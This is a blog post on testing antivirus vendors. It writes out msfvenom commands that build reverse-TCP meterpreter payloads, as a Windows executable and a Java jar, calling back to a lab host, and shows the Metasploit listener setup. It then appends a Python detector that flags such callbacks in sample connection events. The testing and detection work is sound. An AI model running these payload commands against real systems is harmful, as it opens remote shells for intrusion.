Testing AVs With Simple Vectors

Having had the need to run some tests against prospective AV vendors, I have performed some simple tests using Metasploit payloads and Mimikatz. In this post, I will go over the techniques used and how to employ them.

To kick off, I generated a basic executable meterpreter with simple encoding and no encryption.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.1.1.2 LPORT=4444 -o meterpreter.exe -f exe --encoder x64/xor_dynamic --platform windows --arch x64

The options used are:

  • -p the payload to use.
    LHOST and LPORT are the Metasploit options that would normally be set in msfconsole with “set OPTION value”. In this case they are the attacking host and attacking port, because all payloads used are reverse TCP payloads (the victim host connects back to the attacking machine, as opposed to the attacking machine connecting to the victim).

  • -o the output file.

  • -f the format to use. Use raw when generating script payloads (or the language name, e.g. python) to get the native code. There are options to transform payloads, but I will not be covering them here.

  • --platform the target platform. Generally not needed for scripting languages like Python.

  • --arch the target platform architecture. Generally not needed for scripting languages like Python.

Within Metasploit, I kicked off the listener. This will be common to all generated payloads so I will not be repeating it. Just note that the payload and port will need to change depending on what is generated with msfvenom.

use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444

As expected, this was detected without issue; no surprise there.

I generated a few more payloads using various languages. A lot of these runtimes can be shimmed into the environment without requiring an install, making them viable vectors.

Java – detected – requires a JVM or JDK. Execute with java -jar file.jar

msfvenom -f raw -p payload/java/meterpreter/reverse_tcp LHOST=10.1.1.2 LPORT=4443 -o payload.jar
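The two things every payload above has in common are the reverse TCP callback to the handler and, for the scripting variants, a runtime that was dropped into place rather than installed. As an added example that is not part of the original post, the following script runs a simple host-side check over constructed network-connection events (a simplified Sysmon Event ID 3 layout, assumed here) and flags connections that fit either pattern; the runtime list, the port allow-list and the event format are all assumptions.

```python
"""Flag outbound connections that look like a reverse-TCP callback (added example)."""
from dataclasses import dataclass

# Constructed sample events, not real data, in an assumed simplified layout:
# time|image|dest_ip|dest_port|initiated   (initiated=true means outbound)
SAMPLE_EVENTS = """\
2024-01-01T10:00:01|C:\\Windows\\explorer.exe|52.1.2.3|443|true
2024-01-01T10:00:05|C:\\Users\\lab\\meterpreter.exe|10.1.1.2|4444|true
2024-01-01T10:00:09|C:\\tools\\jdk\\bin\\java.exe|10.1.1.2|4443|true
2024-01-01T10:00:12|C:\\tools\\jdk\\bin\\java.exe|52.1.2.4|443|true
2024-01-01T10:00:15|C:\\Python\\python.exe|10.1.1.2|4445|true
2024-01-01T10:00:20|C:\\Windows\\System32\\svchost.exe|10.1.1.2|4444|false
"""

# Runtimes that can be shimmed into a user directory without an installer (assumed list)
SHIMMABLE_RUNTIMES = {"java.exe", "javaw.exe", "python.exe", "pythonw.exe",
                      "powershell.exe", "php.exe", "ruby.exe"}
# Ports on which outbound traffic from an interpreter is routine (assumed allow-list)
EXPECTED_PORTS = {80, 443}

@dataclass
class Finding:
    time: str
    image: str
    dest: str
    reason: str

def parse_event(line):
    time, image, ip, port, initiated = line.split("|")
    return time, image, ip, int(port), initiated == "true"

def flag_callbacks(raw, handler_ports=frozenset()):
    """Return findings for (a) any process initiating a connection to a known
    handler port and (b) a shimmable runtime initiating a connection to a
    port outside EXPECTED_PORTS."""
    findings = []
    for line in raw.strip().splitlines():
        time, image, ip, port, initiated = parse_event(line)
        if not initiated:            # inbound side of the socket, not a callback
            continue
        exe = image.rsplit("\\", 1)[-1].lower()
        dest = f"{ip}:{port}"
        if port in handler_ports:
            findings.append(Finding(time, image, dest, "known handler port"))
        elif exe in SHIMMABLE_RUNTIMES and port not in EXPECTED_PORTS:
            findings.append(Finding(time, image, dest, "runtime to unusual port"))
    return findings
```

Running `flag_callbacks(SAMPLE_EVENTS, handler_ports={4444, 4443})` on the sample returns three findings: the executable and the Java payload on the lab handler ports, and the Python runtime connecting to an unexpected port; the inbound svchost.exe event is ignored.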